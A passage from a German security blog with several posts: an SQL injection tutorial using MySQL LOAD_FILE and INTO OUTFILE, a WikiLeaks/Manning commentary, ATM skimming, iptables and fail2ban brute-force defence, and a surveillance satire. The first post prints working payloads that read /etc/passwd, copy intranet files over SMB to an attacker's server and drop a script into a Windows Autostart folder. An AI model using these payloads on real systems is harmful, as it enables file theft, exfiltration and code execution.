load_file() spielereien
Da mancher Orts noch das Verständnis fehlt, warum es eben nicht nur ein paar Datensätze betrifft, wenn jemand Zuriff über einen SQL Account hat. Möchte ich hier mal kurz aufzeigen welche Möglichkeiten prinzipiell zur Verfügung stehen, wenn man Zugriff auf einen MySQL Account hat. Eine sehr schöne und einfache Variante ist mittels load_file() und angeschlossene.
Grundlage ist z.b. folgender Query:
select 1,LOAD_FILE("/etc/passwd");
Wenn man das Ganze in einem SQL Injection verarbeitet, würde unter bestimmten Bedingungen der Browser dann über die Seite beispielsweise folgendes anzeigen:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh
Ok, da kommt der erste und sagt das File muss Lese- und oder Schreibberechtigungen für Alle oder den Dienst besitzen … hier soll es uns um das Prinzip gehen und ja er hat recht. Im einfachsten Falle suche ich mir bekannte Konfigurationsfiles, .htaccess Dateien etc. und versuche die auszulesen und Butter bei die Fische in 10 von 100 Fällen wird man fündig. Schlampig gesetzte Berechtigungen öffnen einem hier Tür und Tor. Aber an dieser Stelle ist ja noch nicht aller Tage Abend …
select load_file("\\\\[ip | server_name]\\filename");
select 1 INTO OUTFILE "\\\\[ip | server_name]\\filename]";
Sind zwei weitere schöne Möglichkeiten um ans Ziel zu gelangen, im ersteren Falle ziehen wir uns über das SMB Protokoll eine beliebige Datei im zweiten Falle schreiben wir Daten über das SMB Protokoll an einen uns genehmen Platz und hey machen wir uns nichts vor – richtig konfigurierte Firewalls blockieren immer nur den eingehenden Verkehr auf ungenutzten Ports und erlauben immer sämtlichen Verkehr vom Host weg! 
Folgendes nicht unalltägliche Beispielszenario: Eine Firma betreibt einen Webserver auf dem Intranet und Webpräsenz zu gleich laufen, sprich ich kann über ein SQL Injection an allen Sicherheitsmechanismen vorbei Daten in das interne Netz schieben oder sie von dort downloaden.
UNION all select 1,2,load_file("\\\\intranet\\filename"),3,4 INTO OUTFILE "\\\\mein_server\\test";
Da höre ich schon wieder den nächsten Quäker, aber ich weiss doch gar nicht welche Netze … doch die MySQL Variablen report_host und oder hostname geben uns Aufschluss, ansonsten sind wir alle schlau genug zu wissen, welche Netze für den privaten Gebrauch reserviert sind. Wir waren gerade beim Netzwerk … da fällt mir doch noch was ein, DNS Abfrage für Datenbänker – host und dig kann jeder. Auch eine Möglichkeit den internen DNS nach Mustern in der Hostvergabe abzufragen um herauszubekommen welche Netze sich in der Tiefe befinden.
select ‘huhu welt.’ INTO OUTFILE ‘\\\\domain.net\\?save.txt’
Eine interessantes Anwendungsbeispiel ist z.B. in das Startverzeichnis eines Windows Host eine .vbs oder .cmd Datei abzulegen …
select ‘msgbox “pew pew”‘ INTO OUTFILE ‘\\\\192.168.0.x\\c$\\Dokumente und Einstellungen\\All Users\\Startmenü\\Programme\\Autostart\\grussundkuss.vbs’;
Ok und wer immer noch nicht genug hat, der läd sich eine Shell oder überschreibt Dateien.
mehrCollateral Murder Video Leaker wurde festgenommen
Wahrscheinlich haben wir es SPC Bradley Manning(22) zu verdanken, dass die Öffentlichkeit mitbekommt, was bei einem militärischen Einsatz der Amerikaner so läuft. Dass dies kein Einzelfall ist und dass die Verantwortlichen nicht zur Rechenschaft gezogen werden, ist uns allen schmerzhaft nur zu bewusst geworden. Die Amerikaner spielen Weltpolizei und das in autistischer John Wayne Manier. Den Amerikaner an dieser Stelle Einhalt zu gebieten sollte auch unser ureigenstes Anliegen sein, denn wir sind auf dem besten Wege, uns genau in die selbe Richtung zu entwickeln.
Das wird Bradley Manning, insofern er wirklich für die Weiterleitung des Videos an Wikileaks verantwortlich ist, nicht weiterhelfen, ihm werden sie den Prozess machen, dass ihm hören und sehen vergeht. Nach seiner Verhaftung am gestrigen Tage, hat er sich auch noch für den Leak des Garani air strike Videos und für die Übermittlung von 260.000 als classified gekennzeichneten diplomatischen Telegramme, die er selber als “almost criminal political back dealings” bezeichnet, verantwortlich gezeigt. via wired.com
Update: “Erwischt” hat man ihn, weil er einem Ex Hacker Adrian Lamo gegenüber das große Mundwerk gehabt hat, für die Leaks verantwortlich zu sein. Was ihm, wenn das der Realität entspricht zu einem riesen großen Deppen macht. Sogenannte Ex-hacker in USA sind mal classified mit ich hab meinen Arsch ans FBI verkauft. So wirklich sicher ob das alles stimmt, ist man sich auch nicht, die Verschwörungstheoretiker vermuten eine PR – Kampagne des US – Militärs gegen Wikileaks dahinter.
Update: Wie sich herausstellt ist Poulson auch derjenige, der kürzlich in Wired diese Propaganda Story gebracht hatte, dass Wikileaks ihre Informationen illegitim aus Tor – Sniffing erlangt hätten, was sowohl Tor als auch Wikileaks dementieren.
Update: Wikileaks dementieren mittlerweile, dass Sie 260.000 dipl. Botschaftsnachrichten bekommen haben, genauso wie Sie über ihre Quellen keine Aussagen treffen können, weil Sie keine Informationen über die sammeln. Sieht somit summa summarum entweder nach einem Fake der US Amerikaner und nach einem ziemlich doofen Mannigan aus oder nach einem PR Gag. Letzterer wurde ja schon in einem Papier, welches bei Wikileaks geleaked wurde, angekündigt, mit aller Macht die Glaubwürdigkeit und Integrität des Portals zu untergraben. Darüber hinaus erklärt die Washington Post, sie sei 2 Jahre lang im Besitz des Videos gewesen, nur habe es dies nicht veröffentlicht. Da sieht man mal was man von gleichgeschalteten Medien hat, bei uns wäre das genauso passiert, nur hier bezahlen wir dafür, dass sie uns informieren!
mehrGeldautomatennetz gehackt
Nach dem in Deutschland sich die Richter immer noch darin einig sind, dass die Banksysteme sicher sind und es nur durch die Fahrlässigkeit des Kunden zu Unregelmäßigkeiten beim abheben kommt, sollte die liebe Richterschaft endlich mal aufwachen. Meine Karte wurde mir dieses Jahr schon 2 mal gesperrt, jedes mal hatte ich im grenznahen Raum entweder getankt oder etwas eingekauft, die einzige Aussage der Bank zu den Vorfällen war, dass die Karte wahrscheinlich an Geräten zum Einsatz gekommen ist, die manipuliert waren. Ansonsten keine weitere Auskunft und ich bekäme eine neue Karte in 1 Woche zugeschickt! Das weckt Vertrauen! Zum Thema manipulierte EC-Kartenlesegeräte wird man hier, hier und hier ausreichend fündig.
mehrNerfiges Brute Force
Nachdem immer wieder irgendwelche Brutforce Angriffe in meinen Logs aufgetaucht sind, habe ich mich entschlossen prinzipiell etwas dagegen zu unternehmen. Die üblichen Mechanismen root Remotelogins zu verweigern und Portnocking auf bestimmten Diensten sind manchmal einfach nicht umsetzbar …
In früheren Ansätzen habe ich auf iptables zurückgegriffen, hier ein Beispiel für SSH:
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --set --name SSH -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -m recent --update --seconds 60 --hitcount 4 --rttl --name SSH -j LOG --log-prefix "SSH_brute_force "
iptables -A INPUT -p tcp --dport 22 -m recent --update --seconds 60 --hitcount 4 --rttl --name SSH -j DROP
Mitlerweile existieren gute Mechanismen und Tools die es einem sehr einfach ermöglichen, auf solche Angriffe zu reagieren. Ein solches Tool möchte ich hier vorstellen: fail2ban
Fail2Ban ist ein kleines Programm, das Logfiles verschiedenster Programme überwacht und basierend auf Einträgen in den Logfiles Ereignisse auslöst. Es kann sowohl im Hintergrund (als Dämon) als auch im Vordergrund laufen.
mehrStasi 2.0 – oder wie der Haufen zum Kind kommt
Was würde nicht alles passieren, wenn darauf verzichtet würde, uns ständig zu überwachen. Dies zeigt uns sehr eindrucksvoll die Volksbank in Stuttgart. Ohne Videoüberwachung wäre es in diesem Fall wohl nicht möglich gewesen, die Täterin zu ermitteln und die Bank wäre am Ende auf den Reinigungskosten(!) für die Reinigung des Steinfussbodens(!) sitzen geblieben. Kann ja nicht sein, dass das unerlaubte Verschmieren von Hundescheisse auf einem Steinboden einfach so übersehen wird.
mehr
Letzte Kommentare